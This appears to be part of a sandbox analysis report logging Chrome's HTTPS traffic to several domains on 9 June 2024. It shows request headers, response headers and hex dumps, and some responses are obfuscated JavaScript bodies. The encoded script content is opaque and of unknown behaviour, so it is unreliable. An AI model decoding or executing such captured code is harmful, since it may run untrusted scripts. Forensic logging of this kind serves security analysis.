                                                                                                                                                          Data Ascii: NtgZW4bOMzQnNAJlOBgizgZwAIcizge6sV8YnI/gBsZnMqI8DjuOiDdCNjtVW047g8lkcopbf1xiO06eDygKBCvZIBAGrg24ITt5PB47Z156O2w4mJyxwH3OK7uxvzn1HQWXQiQ4A9tIS3y6A9tJYBJ9HosESDzOBEgZNCwUOnojYFIjF3ZKWq47Wdwd6rE+ODtKwzHan0kGu6DNjF5ZNS5kGtgDkCKlpU+ZxBCJJWkEOTkzJRhHG2ogKD+xW0z
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 58 58 34 39 42 67 6c 67 42 46 6c 64 36 5a 6c 46 75 71 6b 59 57 6f 75 77 42 66 75 35 34 42 33 70 76 4b 67 56 7a 33 61 46 73 63 51 50 70 43 4b 63 4b 68 2b 37 33 62 51 38 77 4c 4e 61 57 37 74 31 42 32 55 54 69 68 37 38 42 6c 47 46 79 44 77 41 48 36 44 50 43 7a 31 43 44 74 7a 48 75 50 69 65 4c 31 41 35 54 50 65 38 48 41 39 68 5a 50 70 6b 7a 56 41 52 4f 4e 36 32 48 52 4a 30 54 42 66 41 35 65 2b 37 2f 44 4b 43 4e 37 42 2f 6b 44 71 43 49 68 4e 6b 32 31 36 43 47 55 63 68 67 69 67 44 58 77 4e 67 51 68 57 43 46 42 6a 39 67 6a 55 38 49 34 49 7a 67 69 75 43 4a 49 38 37 67 6a 68 66 73 39 55 50 67 67 53 38 35 2f 31 46 67 69 2b 54 43 45 49 52 51 6a 68 43 4d 49 4e 70 67 41 78 43 48 45 49 75 67 69 4a 43 48 73 4d 4b 51 69 78 41 51 6b 49 39 54 6f 35 43 49 62 47 4f 75 43 46
                                                                                                                                                          Data Ascii: XX49BglgBFld6ZlFuqkYWouwBfu54B3pvKgVz3aFscQPpCKcKh+73bQ8wLNaW7t1B2UTih78BlGFyDwAH6DPCz1CDtzHuPieL1A5TPe8HA9hZPpkzVARON62HRJ0TBfA5e+7/DKCN7B/kDqCIhNk216CGUchgigDXwNgQhWCFBj9gjU8I4IzgiuCJI87gjhfs9UPggS85/1Fgi+TCEIRQjhCMINpgAxCHEIugiJCHsMKQixAQkI9To5CIbGOuCF
                                                                                                                                                          2024-06-09 22:41:02 UTC4510INData Raw: 4a 44 6e 66 64 54 78 71 6c 79 31 75 68 6b 68 6b 32 50 55 37 6d 41 54 31 44 77 64 48 36 78 42 31 41 49 30 52 33 4e 57 77 77 76 55 55 4d 4f 61 36 66 48 62 43 4f 76 73 63 33 65 55 32 39 53 6d 31 46 66 78 34 54 41 48 31 4d 7a 55 78 65 34 68 52 32 66 55 75 4d 56 58 31 47 70 39 34 46 52 79 63 30 55 74 54 39 53 55 4e 4b 2f 55 37 39 54 55 4e 46 2f 55 6c 41 43 2f 31 47 45 41 2f 39 51 45 65 77 73 41 6d 74 53 67 4e 46 73 49 56 65 75 51 4e 50 7a 6e 37 61 69 4d 61 31 6d 41 38 44 54 4d 35 30 67 30 44 47 53 6f 4e 4a 4e 4e 57 44 53 71 4e 48 67 30 58 52 69 57 71 49 51 30 63 31 52 6b 76 57 4b 31 4b 31 51 55 4e 43 2f 55 6b 75 64 48 30 4b 47 62 39 44 52 6f 4e 49 75 73 7a 44 52 46 32 31 79 59 66 2b 69 37 52 62 66 55 76 44 54 72 5a 2b 6a 6b 47 75 64 73 35 7a 75 34 6f 6a 51 63
                                                                                                                                                          Data Ascii: JDnfdTxqly1uhkhk2PU7mAT1DwdH6xB1AI0R3NWwwvUUMOa6fHbCOvsc3eU29Sm1Ffx4TAH1MzUxe4hR2fUuMVX1Gp94FRyc0UtT9SUNK/U79TUNF/UlAC/1GEA/9QEewsAmtSgNFsIVeuQNPzn7aiMa1mA8DTM50g0DGSoNJNNWDSqNHg0XRiWqIQ0c1RkvWK1K1QUNC/UkudH0KGb9DRoNIuszDRF21yYf+i7RbfUvDTrZ+jkGuds5zu4ojQc


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          244192.168.2.54999290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC544OUTGET /pc/240516-03/static/js/common.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:02 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 127284
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:42 GMT
                                                                                                                                                          ETag: "6645ca4a-1f134"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE2[22],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,20],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826106
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bc38ae26c38b7e52f94dc4d5a6422be3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765894
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:02 UTC15744INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 47 5a 63 42 64 41 47 67 47 38 41 69 41 42 67 41 34 42 7a 41 5a 53 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 35 6b 51 5a 4e 41 45 70 71 6e 4a 43 41 41 45 53 58 67 43 64 2b 66 4b 67 47 34 51 41 4f 69 67 42 65 43 69 42 34 6f 41 4a 69 41 37 63 2b 67 74 4d 4b 6d 39 64 58 48 67 4b 47 38 70 41 4e 79 68 4b 35 59 74 47 53 56 6c 2b 36 75 77 6f 53 70 67 67 75 6c 52 55 76 72 71 38 57 67 41 32 68 67 79 38 41 42 62 69 75 6a 54 71 61 41 41 38 53 68 6b 41 31 4c 6b 53 6d 50 7a 52 57 6a 42 4a 48 67 44 43 4a 69 41 41 67 72 79 59 6b 68 49 41 66 4c 71 34 41 47 52 74 2f 4a 6d 74 2b 41 44 73 41 50 77 67 75 53 56 6c 48 6e 55 4e 45 71 7a 38 54 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tf
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 41 66 46 52 30 45 51 39 59 43 32 35 4a 67 58 4f 58 54 35 46 64 77 63 56 57 43 48 44 39 6b 72 32 49 46 64 48 5a 66 59 55 67 46 50 68 56 51 34 44 76 70 66 4d 76 72 41 62 4c 35 68 54 79 2b 73 32 67 48 51 4d 63 68 38 56 39 74 46 6c 65 71 62 4f 41 2b 30 6e 59 48 59 57 6d 6b 46 4d 79 44 73 50 46 55 74 36 33 33 73 79 45 51 37 77 6a 73 52 78 4d 47 4c 65 41 68 38 4b 6f 50 46 65 4c 57 38 7a 75 79 32 38 32 64 42 52 74 38 43 77 56 79 47 45 70 41 4b 6e 4f 6d 31 65 4e 4e 37 69 33 36 6b 51 76 48 51 39 44 74 66 34 4d 68 6d 69 4b 4f 39 70 41 59 78 66 52 4c 30 77 4d 65 4f 33 65 67 59 79 77 6f 68 76 59 67 63 47 44 45 46 44 6d 37 74 47 35 4d 4d 4b 38 46 7a 6b 34 58 47 66 50 30 68 52 4f 51 51 71 59 66 67 37 36 50 32 76 62 4b 72 4c 45 48 59 44 71 41 59 41 31 47 51 6f 69 63 35
                                                                                                                                                          Data Ascii: AfFR0EQ9YC25JgXOXT5FdwcVWCHD9kr2IFdHZfYUgFPhVQ4DvpfMvrAbL5hTy+s2gHQMch8V9tFleqbOA+0nYHYWmkFMyDsPFUt633syEQ7wjsRxMGLeAh8KoPFeLW8zuy282dBRt8CwVyGEpAKnOm1eNN7i36kQvHQ9Dtf4MhmiKO9pAYxfRL0wMeO3egYywohvYgcGDEFDm7tG5MMK8Fzk4XGfP0hROQQqYfg76P2vbKrLEHYDqAYA1GQoic5
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 6c 4f 65 31 53 69 4b 45 46 35 43 50 38 2b 57 78 50 41 42 30 67 68 55 4a 41 51 45 64 34 42 58 53 55 38 6c 64 4a 6d 46 61 58 63 56 32 31 54 6a 4e 6a 71 62 2f 33 63 52 42 46 32 2f 52 39 4b 31 74 48 2f 6f 43 61 4c 6b 49 4d 56 63 55 39 78 67 4d 32 44 4c 45 4d 52 4d 32 75 55 44 4b 61 42 38 4c 6c 6f 62 33 7a 65 79 51 53 4e 51 78 76 41 77 6c 36 58 4b 69 44 77 56 48 57 66 4f 63 2b 43 4a 33 58 70 71 6e 61 6d 46 2b 6c 72 6c 72 71 49 50 34 64 65 45 6e 59 51 6f 65 46 56 59 41 55 6f 4c 52 6f 53 68 6a 49 51 38 78 6b 41 48 61 61 38 78 48 52 4c 49 57 53 46 35 41 70 75 4c 43 6c 4e 35 67 67 64 69 51 56 70 41 43 2f 73 36 33 4f 74 41 49 61 47 4e 35 2f 30 59 7a 74 30 33 74 55 4f 46 75 65 6d 73 4b 62 6b 4b 4b 51 50 54 38 4b 6a 79 52 75 6f 62 72 65 61 79 4d 6f 43 74 33 6e 51 67
                                                                                                                                                          Data Ascii: lOe1SiKEF5CP8+WxPAB0ghUJAQEd4BXSU8ldJmFaXcV21TjNjqb/3cRBF2/R9K1tH/oCaLkIMVcU9xgM2DLEMRM2uUDKaB8Llob3zeyQSNQxvAwl6XKiDwVHWfOc+CJ3XpqnamF+lrlrqIP4deEnYQoeFVYAUoLRoShjIQ8xkAHaa8xHRLIWSF5ApuLClN5ggdiQVpAC/s63OtAIaGN5/0Yzt03tUOFuemsKbkKKQPT8KjyRuobreayMoCt3nQg
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 76 4c 39 5a 66 67 71 72 4a 63 59 41 45 46 54 2f 4b 74 41 4c 36 42 5a 70 63 43 4c 47 6b 6e 5a 4b 58 4a 5a 44 4b 64 37 50 2f 4b 66 4a 5a 35 4c 51 4b 45 6e 4b 66 41 4b 41 72 35 35 55 7a 4b 41 4a 41 46 4c 6c 35 66 33 4c 6a 75 53 51 71 68 35 51 70 6a 39 5a 53 46 4c 41 70 51 77 42 71 46 5a 50 4c 6a 70 53 6b 41 65 46 53 74 79 2b 46 65 53 4c 52 67 49 53 4b 68 46 57 76 4c 53 46 57 49 71 41 6e 6c 46 4c 43 52 64 49 71 6a 70 65 65 79 54 51 4e 33 4c 56 5a 65 41 71 2b 46 58 53 4b 45 50 43 6c 4c 51 49 4d 51 72 64 5a 57 51 72 52 73 58 46 4b 7a 46 54 6f 71 68 5a 65 65 79 37 51 4c 4e 4c 38 70 53 41 42 53 70 51 2f 4b 6b 35 61 36 42 36 46 51 4b 4a 53 70 64 4b 79 75 66 48 6f 51 79 45 65 4d 38 6e 4a 4e 38 42 35 38 4f 4d 39 42 75 44 6f 42 51 69 55 55 44 48 6a 6b 65 51 61 2b 70
                                                                                                                                                          Data Ascii: vL9ZfgqrJcYAEFT/KtAL6BZpcCLGknZKXJZDKd7P/KfJZ5LQKEnKfAKAr55UzKAJAFLl5f3LjuSQqh5Qpj9ZSFLApQwBqFZPLjpSkAeFSty+FeSLRgISKhFWvLSFWIqAnlFLCRdIqjpeeyTQN3LVZeAq+FXSKEPClLQIMQrdZWQrRsXFKzFToqhZeey7QLNL8pSABSpQ/Kk5a6B6FQKJSpdKyufHoQyEeM8nJN8B58OM9BuDoBQiUUDHjkeQa+p
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 41 59 37 6c 41 41 47 41 75 67 41 44 46 56 51 41 42 6f 52 68 30 34 34 36 38 53 32 49 6d 79 59 7a 7a 57 62 52 70 31 67 50 4c 35 62 55 43 7a 79 37 77 30 72 59 4f 58 64 4f 48 2f 64 65 6e 62 64 66 63 6d 67 46 77 78 76 30 6d 57 77 35 47 57 57 37 47 57 46 4b 32 6a 47 5a 6c 54 37 71 2b 70 54 48 37 74 73 39 6c 56 30 2f 52 36 33 6e 57 54 71 6a 49 59 39 76 74 51 69 4d 59 39 43 38 42 57 35 67 48 6c 65 41 77 36 33 6d 33 71 4f 51 71 6e 30 67 4f 39 6d 59 57 36 75 58 49 32 35 32 6e 38 4f 57 65 33 31 30 50 70 4a 6b 32 39 70 42 44 72 76 54 41 64 67 4e 4d 48 79 34 48 58 58 59 43 41 50 68 51 4f 37 41 5a 50 30 42 68 41 48 66 41 66 49 37 38 44 79 5a 59 4c 75 4b 63 4c 49 4f 7a 4e 6b 48 4e 5a 45 33 53 47 33 74 32 4c 4b 38 4a 79 39 44 35 77 76 59 68 37 59 4a 74 44 35 77 6b 61 55
                                                                                                                                                          Data Ascii: AY7lAAGAugADFVQABoRh04468S2ImyYzzWbRp1gPL5bUCzy7w0rYOXdOH/denbdfcmgFwxv0mWw5GWW7GWFK2jGZlT7q+pTH7ts9lV0/R63nWTqjIY9vtQiMY9C8BW5gHleAw63m3qOQqn0gO9mYW6uXI252n8OWe310PpJk29pBDrvTAdgNMHy4HXXYCAPhQO7AZP0BhAHfAfI78DyZYLuKcLIOzNkHNZE3SG3t2LK8Jy9D5wvYh7YJtD5wkaU
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 6c 47 5a 47 47 61 51 4b 6b 30 37 57 48 42 66 67 38 68 4b 35 44 4d 50 6f 78 68 43 57 46 55 69 6f 43 49 69 64 79 47 4b 6b 5a 68 4d 2f 49 38 6d 4f 38 63 49 70 6a 76 48 46 4b 59 55 51 70 41 31 69 30 79 35 41 41 34 2b 50 63 4b 38 43 47 5a 41 4b 4a 68 61 61 48 49 49 56 49 41 54 32 48 33 59 62 78 68 64 32 47 73 50 4b 30 41 6b 30 69 43 37 4f 79 68 77 2b 43 45 49 5a 35 68 4f 6d 48 41 59 53 49 63 4f 30 37 45 6f 52 52 32 68 52 43 62 4c 74 56 4f 4a 41 44 6b 41 47 5a 68 36 4f 47 4a 78 50 43 36 71 61 5a 63 2b 4f 79 68 77 42 77 77 34 58 77 6f 5a 6d 46 77 34 55 70 41 6e 32 48 50 77 45 68 47 6a 67 4c 6c 77 49 66 41 4f 65 5a 30 67 56 6a 68 65 69 69 50 5a 75 51 57 69 4a 68 63 2b 4a 4f 68 59 43 71 74 45 4f 33 73 58 52 43 32 6b 44 39 68 59 2f 62 73 41 4f 4f 41 38 35 62 32 41
                                                                                                                                                          Data Ascii: lGZGGaQKk07WHBfg8hK5DMPoxhCWFUioCIidyGKkZhM/I8mO8cIpjvHFKYUQpA1i0y5AA4+PcK8CGZAKJhaaHIIVIAT2H3Ybxhd2GsPK0Ak0iC7Oyhw+CEIZ5hOmHAYSIcO07EoRR2hRCbLtVOJADkAGZh6OGJxPC6qaZc+OyhwBww4XwoZmFw4UpAn2HPwEhGjgLlwIfAOeZ0gVjheiiPZuQWiJhc+JOhYCqtEO3sXRC2kD9hY/bsAOOA85b2A
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 72 51 57 2f 47 4f 2b 4b 65 63 76 58 6c 6e 41 4b 4e 35 6a 66 46 47 6f 45 64 35 49 33 6b 7a 65 51 37 78 34 63 67 58 65 61 71 5a 56 33 6c 6e 41 4e 46 77 52 33 6e 69 41 4b 75 52 63 79 72 63 33 74 4a 49 37 33 6d 72 65 64 56 35 61 4f 47 2b 41 47 30 45 72 46 7a 6d 5a 74 41 52 52 47 49 31 67 42 7a 51 68 48 7a 42 38 49 4d 51 53 38 34 46 51 50 74 41 32 78 54 4e 51 49 4f 55 4b 53 67 32 73 4a 4e 41 4b 55 44 57 6c 4b 4a 53 6f 6d 43 69 6a 6f 50 57 62 31 6d 70 57 61 43 4b 6f 64 6e 47 42 4b 33 34 6a 34 4b 4e 37 6d 4f 2b 30 63 77 4c 64 42 70 55 6d 38 41 51 76 42 6a 35 76 41 44 37 34 68 70 55 30 37 45 4f 33 4d 78 5a 36 49 4a 45 2b 63 45 41 4a 50 6e 36 67 68 70 55 44 4d 5a 6c 61 62 41 6f 4c 62 6c 64 69 66 36 5a 6a 61 43 34 2b 62 56 67 4f 6b 41 38 71 4f 75 67 50 61 6e 79 72
                                                                                                                                                          Data Ascii: rQW/GO+KecvXlnAKN5jfFGoEd5I3kzeQ7x4cgXeaqZV3lnANFwR3niAKuRcyrc3tJI73mredV5aOG+AG0ErFzmZtARRGI1gBzQhHzB8IMQS84FQPtA2xTNQIOUKSg2sJNAKUDWlKJSomCijoPWb1mpWaCKodnGBK34j4KN7mO+0cwLdBpUm8AQvBj5vAD74hpU07EO3MxZ6IJE+cEAJPn6ghpUDMZlabAoLbldif6ZjaC4+bVgOkA8qOugPanyr
                                                                                                                                                          2024-06-09 22:41:02 UTC13236INData Raw: 74 74 43 32 30 4d 62 51 2f 45 7a 4b 33 56 42 49 35 74 34 30 44 71 62 56 31 74 47 36 31 78 7a 63 4a 74 44 6d 32 74 62 52 32 74 51 32 33 52 32 4e 71 41 37 6d 33 62 72 64 65 6b 58 6d 33 6e 51 50 64 74 6c 64 68 74 72 63 39 74 55 30 44 46 62 55 6c 41 37 32 30 78 6e 4f 73 74 68 57 33 55 62 59 35 74 75 6e 6f 49 72 61 6a 38 41 6d 33 41 72 54 33 56 64 56 6a 4d 72 66 6c 35 77 71 30 70 51 4b 44 74 6e 31 67 75 62 51 31 74 57 36 42 74 31 58 33 56 30 4f 33 63 62 57 74 74 6e 68 6c 6e 62 62 46 74 59 4f 32 49 37 51 78 74 52 4b 31 32 62 54 64 74 55 57 30 43 6b 4a 4f 74 59 4f 30 4d 62 59 79 74 76 36 32 73 72 5a 5a 74 75 61 33 77 37 5a 7a 59 44 47 31 38 72 64 44 74 66 57 30 59 37 59 71 55 4a 4f 32 66 57 41 78 74 55 44 57 5a 62 59 39 41 4d 6d 30 4c 41 50 70 74 31 4b 33 73 32
                                                                                                                                                          Data Ascii: ttC20MbQ/EzK3VBI5t40DqbV1tG61xzcJtDm2tbR2tQ23R2NqA7m3brdekXm3nQPdtldhtrc9tU0DFbUlA720xnOsthW3UbY5tunoIraj8Am3ArT3VdVjMrfl5wq0pQKDtn1gubQ1tW6Bt1X3V0O3cbWttnhlnbbFtYO2I7QxtRK12bTdtUW0CkJOtYO0MbYytv62srZZtua3w7ZzYDG18rdDtfW0Y7YqUJO2fWAxtUDWZbY9AMm0LAPpt1K3s2


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          245192.168.2.54999523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC635OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:02 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[4],EU-FRA-paris-GLOBAL1-CACHE12[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524002
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fbbf31bfec44ef5b0480cc16cb1b7bfa
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67998
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:02 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          246192.168.2.54999890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC543OUTGET /pc/240516-03/static/js/t4045.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:02 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 49292
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:39 GMT
                                                                                                                                                          ETag: "6645cb73-c08c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[53],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,52],EU-FRA-paris-GLOBAL1-CACHE11[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467554
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4ac2b2167a3cc5ac0437536cf51f3c66
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124446
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:02 UTC15752INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6c 77 46 59 42 64 41 47 67 47 38 41 69 41 61 67 41 34 62 38 71 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 63 79 61 4d 69 41 43 55 46 41 47 35 51 41 54 67 41 49 55 41 62 68 51 42 65 44 6c 7a 34 43 4a 56 64 6b 68 42 79 6b 33 47 62 78 35 56 46 30 2b 55 4c 51 71 4b 61 4b 41 46 73 51 7a 4b 67 43 38 41 46 67 48 30 41 77 67 44 6b 71 5a 52 79 51 6b 4b 41 42 7a 45 43 52 6d 43 69 68 57 62 68 41 5a 4e 6b 34 65 66 6a 52 42 59 51 6b 5a 45 47 35 32 47 54 51 71 4f 56 70 75 47 69 70 41 55 66 31 41 62 77 7a 41 43 6e 56 61 4e 47 77 41 42 68 49 69 77 47 6b 35 51 44 67 56 4b 67 42 66 4d 69 67 41 47 77 67 33 4b 41 38 41 45 79 67 6b 4e 77 53 4e 5a 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZlwFYBdAGgG8AiAagA4b8qAuAMwFc0YAXAS3UzcyaMiACUFAG5QATgAIUAbhQBeDlz4CJVdkhByk3Gbx5VF0+ULQqKaKAFsQzKgC8AFgH0AwgDkqZRyQkKABzECRmCihWbhAZNk4efjRBYQkZEG52GTQqOVpuGipAUf1AbwzACnVaNGwABhIiwGk5QDgVKgBfMigAGwg3KA8AEygkNwSNZM
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 48 4f 76 6e 33 46 57 4a 4c 31 4b 36 47 6e 37 4c 44 31 32 58 6d 31 56 56 35 53 2f 35 75 69 50 39 56 36 59 63 43 39 59 6c 63 4c 41 52 55 55 75 67 43 32 54 67 39 45 66 2f 68 48 43 6f 45 33 47 73 63 50 4f 59 6e 52 58 39 70 46 57 37 75 56 67 65 37 75 74 34 33 33 33 56 6b 49 4a 56 75 59 77 59 77 43 4d 50 53 55 50 47 32 54 62 61 68 4d 44 78 6d 4c 4e 76 6d 31 73 7a 63 62 79 59 69 68 55 43 71 41 47 7a 69 77 33 35 71 33 59 66 4b 6f 57 63 4a 54 4c 44 33 63 32 69 56 45 73 58 65 70 6a 47 50 52 34 39 69 5a 57 4c 76 47 35 6d 35 68 4b 33 6f 6b 30 47 50 35 66 61 6a 36 52 62 73 76 69 64 78 49 2b 73 41 57 48 68 77 45 79 62 59 4c 4d 42 31 47 6a 39 54 45 36 79 59 55 52 73 4a 75 30 69 46 4a 46 59 76 32 79 57 2b 50 55 6c 6a 66 7a 2f 68 4d 67 71 6f 73 55 46 59 6e 43 46 50 4b 73
